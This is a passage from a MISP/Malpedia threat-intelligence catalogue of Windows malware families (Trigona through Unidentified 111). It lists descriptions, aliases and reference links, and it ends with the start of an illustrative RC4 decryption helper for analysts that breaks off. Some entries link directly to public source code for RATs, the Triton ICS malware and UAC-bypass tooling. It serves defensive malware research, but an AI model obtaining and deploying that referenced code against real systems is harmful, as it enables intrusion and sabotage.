https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/

https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a

https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://blog.fraudwatchinternational.com/malware/trickbot-malware-works

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/

https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization

https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works

https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/

https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks

http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.cert.pl/en/news/single/detricking-trickbot-loader/

https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/

https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader

https://securelist.com/trickbot-module-descriptions/104603/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/privateloader-malware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html

https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf

Trigona

According to PCrisk, Trigona is ransomware that encrypts files and appends the "._locked" extension to filenames. Also, it drops the "how_to_decrypt.hta" file that opens a ransom note. An example of how Trigona renames files: it renames "1.jpg" to "1.jpg._locked", "2.png" to "2.png._locked", and so forth.

It embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.

The tag is: misp-galaxy:malpedia="Trigona"

Trigona is also known as:

Table 4798. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona

https://resources.prodaft.com/wazawaka-report

https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html

https://asec.ahnlab.com/en/51343/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware

https://unit42.paloaltonetworks.com/trigona-ransomware-update/

Triton

Malware targeting Triconex Safety Instrumented System (SIS) controllers, which are commonly used in Industrial Control Systems (ICS).

The tag is: misp-galaxy:malpedia="Triton"

Triton is also known as:

  • HatMan

  • Trisis

Table 4799. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.triton

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

https://github.com/ICSrepo/TRISIS-TRITON-HATMAN

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF

https://home.treasury.gov/news/press-releases/sm1162

https://www.cisa.gov/uscert/ncas/alerts/aa22-083a

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.eenews.net/stories/1060123327/

https://www.ic3.gov/Media/News/2022/220325.pdf

Trochilus RAT

Trochilus is a RAT written in C++ whose source code is available on GitHub:

  • https://github.com/m0n0ph1/malware-1/tree/master/Trochilus

  • https://github.com/5loyd/trochilus

The tag is: misp-galaxy:malpedia="Trochilus RAT"

Trochilus RAT is also known as:

Table 4800. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat

https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://github.com/m0n0ph1/malware-1/tree/master/Trochilus

https://github.com/5loyd/trochilus/

https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

TroubleGrabber

The tag is: misp-galaxy:malpedia="TroubleGrabber"

TroubleGrabber is also known as:

Table 4802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber

https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord

troystealer

The tag is: misp-galaxy:malpedia="troystealer"

troystealer is also known as:

Table 4803. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer

https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users

Trump Ransom

The tag is: misp-galaxy:malpedia="Trump Ransom"

Trump Ransom is also known as:

Table 4804. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom

Tsifiri

The tag is: misp-galaxy:malpedia="Tsifiri"

Tsifiri is also known as:

Table 4805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri

TUNNELFISH

The tag is: misp-galaxy:malpedia="TUNNELFISH"

TUNNELFISH is also known as:

Table 4806. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tunnelfish

https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors

turian

According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.

The tag is: misp-galaxy:malpedia="turian"

turian is also known as:

Table 4807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.turian

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://unit42.paloaltonetworks.com/playful-taurus/

https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day

TYPEFRAME

TYPEFRAME is a RAT.

It supports roughly 25 commands covering operations on the victim’s filesystem, manipulation of its own configuration, modification of the system firewall, download and execution of additional tools from the attacker’s C&C, and uninstallation via a self-deleting batch script. The commands are indexed by 16-bit integers starting at 0x8000.

The RAT uses RC4 to decrypt its binary configuration and carries a statically linked OpenSSL 0.9.8k library for SSL communication.

The tag is: misp-galaxy:malpedia="TYPEFRAME"

TYPEFRAME is also known as:

Table 4812. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe

https://www.cisa.gov/news-events/analysis-reports/ar18-165a

Typhon Stealer

According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.

The tag is: misp-galaxy:malpedia="Typhon Stealer"

Typhon Stealer is also known as:

  • Typhon Reborn V2

Table 4814. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.typhon_stealer

https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/

T-Cmd

The tag is: misp-galaxy:malpedia="T-Cmd"

T-Cmd is also known as:

  • t_cmd

Table 4816. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.t_cmd

https://github.com/crackeeer/2006-defconbot/blob/master/T-cmd.cpp

T-RAT 2.0

The tag is: misp-galaxy:malpedia="T-RAT 2.0"

T-RAT 2.0 is also known as:

Table 4817. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat

https://www.gdatasoftware.com/blog/trat-control-via-smartphone

UACMe

A toolkit maintained by hfiref0x that incorporates numerous UAC bypass techniques for Windows 7 through Windows 10. Components of this tool are typically stripped out and reused by malicious actors.

The tag is: misp-galaxy:malpedia="UACMe"

UACMe is also known as:

  • Akagi

Table 4818. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

https://github.com/hfiref0x/UACME

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

Uiwix

The tag is: misp-galaxy:malpedia="Uiwix"

Uiwix is also known as:

Table 4821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix

https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue

Umbral

Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, it can steal a variety of data, including usernames, passwords, online banking credentials and confidential files, and it can also change system settings and execute harmful commands. Umbral is a serious threat and should be removed immediately if found.

The tag is: misp-galaxy:malpedia="Umbral"

Umbral is also known as:

Table 4822. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.umbral

https://blog.cyble.com/2023/06/23/trojanized-super-mario-game-installer-spreads-supremebot-malware/

Unidentified 001

The tag is: misp-galaxy:malpedia="Unidentified 001"

Unidentified 001 is also known as:

Table 4824. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001

Unidentified 003

The tag is: misp-galaxy:malpedia="Unidentified 003"

Unidentified 003 is also known as:

Table 4825. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003

Unidentified 006

The tag is: misp-galaxy:malpedia="Unidentified 006"

Unidentified 006 is also known as:

Table 4826. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006

Unidentified 013 (Korean)

The tag is: misp-galaxy:malpedia="Unidentified 013 (Korean)"

Unidentified 013 (Korean) is also known as:

Table 4827. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware

http://blog.talosintelligence.com/2017/02/korean-maldoc.html

Unidentified 020 (Vault7)

The tag is: misp-galaxy:malpedia="Unidentified 020 (Vault7)"

Unidentified 020 (Vault7) is also known as:

Table 4828. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7

https://wikileaks.org/ciav7p1/cms/page_34308128.html

Unidentified 022 (Ransom)

The tag is: misp-galaxy:malpedia="Unidentified 022 (Ransom)"

Unidentified 022 (Ransom) is also known as:

Table 4829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom

Unidentified 023

The tag is: misp-galaxy:malpedia="Unidentified 023"

Unidentified 023 is also known as:

Table 4830. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023

Unidentified 024 (Ransomware)

The tag is: misp-galaxy:malpedia="Unidentified 024 (Ransomware)"

Unidentified 024 (Ransomware) is also known as:

Table 4831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom

https://twitter.com/malwrhunterteam/status/789161704106127360

Unidentified 025 (Clickfraud)

The tag is: misp-galaxy:malpedia="Unidentified 025 (Clickfraud)"

Unidentified 025 (Clickfraud) is also known as:

Table 4832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud

http://malware-traffic-analysis.net/2016/05/09/index.html

Unidentified 028

The tag is: misp-galaxy:malpedia="Unidentified 028"

Unidentified 028 is also known as:

Table 4833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028

Unidentified 029

The tag is: misp-galaxy:malpedia="Unidentified 029"

Unidentified 029 is also known as:

Table 4834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029

Unidentified 030 (Ransomware)

Unnamed ransomware that masquerades as a system-cleanup program called "System Analyzer Pro".

The tag is: misp-galaxy:malpedia="Unidentified 030 (Ransomware)"

Unidentified 030 (Ransomware) is also known as:

Table 4835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030

https://twitter.com/JaromirHorejsi/status/877811773826641920

Unidentified 031

The tag is: misp-galaxy:malpedia="Unidentified 031"

Unidentified 031 is also known as:

Table 4836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031

Unidentified 037

The tag is: misp-galaxy:malpedia="Unidentified 037"

Unidentified 037 is also known as:

Table 4837. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037

Unidentified 038

The tag is: misp-galaxy:malpedia="Unidentified 038"

Unidentified 038 is also known as:

Table 4838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038

Unidentified 039

The tag is: misp-galaxy:malpedia="Unidentified 039"

Unidentified 039 is also known as:

Table 4839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039

Unidentified 041

The tag is: misp-galaxy:malpedia="Unidentified 041"

Unidentified 041 is also known as:

Table 4840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041

Unidentified 042

The tag is: misp-galaxy:malpedia="Unidentified 042"

Unidentified 042 is also known as:

Table 4841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042

http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/

Unidentified 044

The tag is: misp-galaxy:malpedia="Unidentified 044"

Unidentified 044 is also known as:

Table 4842. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044

Unidentified 045

The tag is: misp-galaxy:malpedia="Unidentified 045"

Unidentified 045 is also known as:

Table 4843. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045

Unidentified 047

RAT written in Delphi used by Patchwork APT.

The tag is: misp-galaxy:malpedia="Unidentified 047"

Unidentified 047 is also known as:

Table 4844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Unidentified 052

The tag is: misp-galaxy:malpedia="Unidentified 052"

Unidentified 052 is also known as:

Table 4845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052

Unidentified 053 (Wonknu?)

The tag is: misp-galaxy:malpedia="Unidentified 053 (Wonknu?)"

Unidentified 053 (Wonknu?) is also known as:

Table 4846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053

Unidentified 057

Unnamed port scanner used in the Australian Parliament hack (February 2019).

The tag is: misp-galaxy:malpedia="Unidentified 057"

Unidentified 057 is also known as:

Table 4847. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057

https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

Unidentified 066

This .NET executable can receive commands from its C2 server, upload and download files according to the returned content, uninstall itself, or modify the registry to persist across reboots. Finally, it downloads a Python-based RAT called PeppyRAT.

The tag is: misp-galaxy:malpedia="Unidentified 066"

Unidentified 066 is also known as:

Table 4849. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066

https://s.tencent.com/research/report/669.html

Unidentified 067

The tag is: misp-galaxy:malpedia="Unidentified 067"

Unidentified 067 is also known as:

Table 4850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067

https://s.tencent.com/research/report/831.html

Unidentified 068

The tag is: misp-galaxy:malpedia="Unidentified 068"

Unidentified 068 is also known as:

Table 4851. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068

https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt

Unidentified 069 (Zeus Unnamed2)

Zeus derivative; no known public references.

The tag is: misp-galaxy:malpedia="Unidentified 069 (Zeus Unnamed2)"

Unidentified 069 (Zeus Unnamed2) is also known as:

Table 4852. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069

https://zeusmuseum.com/unnamed%202/

Unidentified 070 (Downloader)

Unidentified downloader, possibly related to KONNI.

The tag is: misp-galaxy:malpedia="Unidentified 070 (Downloader)"

Unidentified 070 (Downloader) is also known as:

Table 4853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070

https://twitter.com/M11Sec/status/1217781224204357633

Unidentified 071 (Zeus Unnamed1)

The tag is: misp-galaxy:malpedia="Unidentified 071 (Zeus Unnamed1)"

Unidentified 071 (Zeus Unnamed1) is also known as:

Table 4854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071

https://zeusmuseum.com/unnamed%201/

Unidentified 072 (Metamorfo Loader)

MSI-based loader that has been observed as a stager for win.metamorfo.

The tag is: misp-galaxy:malpedia="Unidentified 072 (Metamorfo Loader)"

Unidentified 072 (Metamorfo Loader) is also known as:

Table 4855. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

Unidentified 074 (Downloader)

The tag is: misp-galaxy:malpedia="Unidentified 074 (Downloader)"

Unidentified 074 (Downloader) is also known as:

Table 4856. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074

https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html

Unidentified 075

Unpacked http_dll.dat from the blog post.

The tag is: misp-galaxy:malpedia="Unidentified 075"

Unidentified 075 is also known as:

Table 4857. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075

Unidentified 078 (Zebrocy Nim Loader?)

Suspected Zebrocy loader written in Nim.

The tag is: misp-galaxy:malpedia="Unidentified 078 (Zebrocy Nim Loader?)"

Unidentified 078 (Zebrocy Nim Loader?) is also known as:

Table 4860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078

https://twitter.com/Vishnyak0v/status/1300704689865060353

Unidentified 080

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc.; the first-stage custom installer uses the same classes. The Trojan uses the HTTP Server API to filter HTTPS packets on port 443 and parse commands. The attackers also use it to gather a target’s data, move laterally and create SOCKS tunnels to their C2 using the Earthworm tunneler. Because the Trojan is itself an HTTPS server, the SOCKS tunnel is used for targets without an external IP so that the C2 is able to send commands.

The tag is: misp-galaxy:malpedia="Unidentified 080"

Unidentified 080 is also known as:

Table 4861. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080

https://securelist.com/luckymouse-ndisproxy-driver/87914/

Unidentified 081 (Andariel Ransomware)

Kaspersky observed Andariel dropping this ransomware in one case during a series of attacks against targets in South Korea in April 2021.

The tag is: misp-galaxy:malpedia="Unidentified 081 (Andariel Ransomware)"

Unidentified 081 (Andariel Ransomware) is also known as:

Table 4862. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

Unidentified 083 (AutoIT Stealer)

The tag is: misp-galaxy:malpedia="Unidentified 083 (AutoIT Stealer)"

Unidentified 083 (AutoIT Stealer) is also known as:

Table 4863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083

https://www.intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/

Unidentified 085

A RAT written in .NET, potentially used by Transparent Tribe.

The tag is: misp-galaxy:malpedia="Unidentified 085"

Unidentified 085 is also known as:

Table 4864. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_085

https://blog.cyble.com/2021/09/14/apt-group-targets-indian-defense-officials-through-enhanced-ttps/

Unidentified 087

Symantec describes this family as an unidentified tool set used to target a range of organizations in South East Asia. The campaign was first noticed in September 2020.

The tag is: misp-galaxy:malpedia="Unidentified 087 "

Unidentified 087 is also known as:

Table 4865. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-south-east-asia?s=09

Unidentified 088 (Nim Ransomware)

Ransomware written in Nim.

The tag is: misp-galaxy:malpedia="Unidentified 088 (Nim Ransomware)"

Unidentified 088 (Nim Ransomware) is also known as:

Table 4866. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

Unidentified 091

Avast found this unidentified RAT, which abuses a code-signing certificate belonging to the Philippine Navy. It is statically linked against OpenSSL 1.1.1g.

The tag is: misp-galaxy:malpedia="Unidentified 091"

Unidentified 091 is also known as:

Table 4867. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091

https://decoded.avast.io/threatintel/avast-finds-compromised-philippine-navy-certificate-used-in-remote-access-tool/

Unidentified 092 (Confucius Backdoor)

According to Antiy CERT, this is a C++ backdoor that was first discovered in an attack by Confucius in September 2020. Its main functions include creating scheduled tasks, retrieving process information, retrieving network adapter information, retrieving disk drive information, uploading files, downloading files, executing files, and providing shell access.

The tag is: misp-galaxy:malpedia="Unidentified 092 (Confucius Backdoor)"

Unidentified 092 (Confucius Backdoor) is also known as:

Table 4868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092

https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ

Unidentified 093 (Sidewinder)

Check Point Research observed this malware being used by Sidewinder.

The tag is: misp-galaxy:malpedia="Unidentified 093 (Sidewinder)"

Unidentified 093 (Sidewinder) is also known as:

Table 4869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_093

https://blog.checkpoint.com/2022/07/13/a-hit-is-made-suspected-india-based-sidewinder-apt-successfully-cyber-attacks-pakistan-military-focused-targets/

Unidentified 095 (Iranian Wiper)

Wiper that uses the EldoS RawDisk driver for low-level disk access.

The tag is: misp-galaxy:malpedia="Unidentified 095 (Iranian Wiper)"

Unidentified 095 (Iranian Wiper) is also known as:

Table 4871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095

https://www.cisa.gov/uscert/ncas/alerts/aa22-264a

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf

Unidentified 096 (Keylogger)

Keylogger.

The tag is: misp-galaxy:malpedia="Unidentified 096 (Keylogger)"

Unidentified 096 (Keylogger) is also known as:

Table 4872. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

Unidentified 099 (APT29 Dropbox Loader)

This malware uses Dropbox for C2 and was spread via spear-phishing attacks against government organizations. It is distinct from win.boombox, another APT29-attributed malware that uses Dropbox (written in .NET).

The tag is: misp-galaxy:malpedia="Unidentified 099 (APT29 Dropbox Loader)"

Unidentified 099 (APT29 Dropbox Loader) is also known as:

Table 4875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md

Unidentified 103 (FIN8)

Malware that uses .NET to load unmanaged (shell)code and bears some resemblance to BADHATCH; the IP address found in the sample was referenced in coverage of WHITERABBIT ransomware attacks.

The tag is: misp-galaxy:malpedia="Unidentified 103 (FIN8)"

Unidentified 103 (FIN8) is also known as:

  • Sardonic

Table 4877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e

Unidentified 104

The tag is: misp-galaxy:malpedia="Unidentified 104"

Unidentified 104 is also known as:

Table 4878. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104

https://twitter.com/jaydinbas/status/1663916211975987201

Unidentified 105

The tag is: misp-galaxy:malpedia="Unidentified 105"

Unidentified 105 is also known as:

Table 4879. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105

https://twitter.com/h2jazi/status/1681426768597778440

Unidentified 109 (Lazarus?)

The tag is: misp-galaxy:malpedia="Unidentified 109 (Lazarus?)"

Unidentified 109 (Lazarus?) is also known as:

Table 4883. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109

https://twitter.com/malwrhunterteam/status/1689533484597952514

Unidentified 110 (RustyFlag)

According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.

The tag is: misp-galaxy:malpedia="Unidentified 110 (RustyFlag)"

Unidentified 110 (RustyFlag) is also known as:

Table 4884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110

https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets

Unidentified 111 (IcedID Loader)

First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4-encrypted requests. It can execute discovery commands, query information about the victim’s machine, update itself, and download and execute an EXE, DLL or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of the IcedID (aka BokBot) malware.

The tag is: misp-galaxy:malpedia="Unidentified 111 (IcedID Loader)"

Unidentified 111 (IcedID Loader) is also known as:

  • BLACKWIDOW

  • Latrodectus

  • Lotus

Table 4885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

https://twitter.com/Myrtus0x0/status/1732997981866209550

https://www.esentire.com/blog/danabots-latest-move-deploying-icedid

https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39
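Two entries in this section rely on RC4: TYPEFRAME decrypts its binary configuration with it, and BLACKWIDOW/Latrodectus encrypts its HTTP requests with it. The analyst's task is the same in both cases: implement the cipher, apply a candidate key, and check whether the output looks like the expected plaintext. The block below is an added example written for this page; it is not code from Malpedia, from either malware family, or from the cited reports. The key, the NUL-separated field layout, the candidate-key list and the sample blob are constructed for illustration and are not the real families' values. The cipher itself is checked against the public RC4 test vectors.

```python
"""RC4 helpers for recovering a malware configuration blob.

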